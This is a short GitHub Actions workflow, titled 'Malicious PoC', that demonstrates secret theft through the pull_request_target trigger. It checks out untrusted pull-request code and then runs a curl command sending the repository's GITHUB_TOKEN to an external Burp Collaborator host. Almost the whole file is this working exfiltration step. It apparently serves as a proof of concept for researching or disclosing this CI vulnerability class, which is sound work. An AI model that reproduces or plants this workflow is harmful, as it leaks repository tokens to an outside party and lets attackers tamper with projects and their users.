on:
  pull_request_target:
permissions:
  contents: read
  pull-requests: write
name: Malicious PoC
jobs:
  labeler:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # This checks out untrusted PR code
      - name: Malicious step
        run: |
          curl https://kvjo1bwzt6i4weymbwdi3u27tyzond.burpcollaborator.net?token=${{ secrets.GITHUB_TOKEN }}
